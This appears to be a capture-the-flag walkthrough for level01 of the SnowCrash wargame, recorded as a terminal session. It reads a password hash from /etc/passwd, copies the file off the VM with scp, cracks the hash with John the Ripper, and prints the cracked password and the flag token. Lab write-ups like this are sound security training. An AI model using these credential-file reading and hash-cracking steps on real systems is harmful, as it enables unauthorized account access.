# in the vm while logged as level01, try to find info about flag01 in /etc/passwd
< level01@SnowCrash:~$ cat /etc/passwd | grep flag01
> flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
< level01@SnowCrash:~$ exit
# now we copy the passwd file from scp to work on it locally
< foo@DESKTOP-SN4HJPM:~/snowcrash/level01/Ressources$ scp -P 4242 level01@192.168.1.83:/etc/passwd .
>            _____                      _____               _
>           / ____|                    / ____|             | |
>          | (___  _ __   _____      _| |     _ __ __ _ ___| |__
>           \___ \| '_ \ / _ \ \ /\ / / |    | '__/ _` / __| '_ \
>           ____) | | | | (_) \ V  V /| |____| | | (_| \__ \ | | |
>          |_____/|_| |_|\___/ \_/\_/  \_____|_|  \__,_|___/_| |_|
>
>   Good luck & Have fun
>
>           192.168.1.83
< level01@192.168.1.83's password:
> passwd                                                                                100% 2477     2.6MB/s   00:00
< foo@DESKTOP-SN4HJPM:~/snowcrash/level01/Ressources$ ls
> passwd
# we now have the passwd file containing info about flag01's password
# so we will crack the password using john on our local machine
# on the evaluation xubuntu vm, the password will only show if you don't use the --show option !!!
< foo@DESKTOP-SN4HJPM:~/snowcrash/level01$ john --show passwd
> flag01:abcdefg:3001:3001::/home/flag/flag01:/bin/bash
> 
> 1 password hash cracked, 0 left
# after connecting to flag01, we launch getflag
< flag01@SnowCrash:~$ getflag
> Check flag.Here is your token : f2av5il02puano7naaf6adaaf
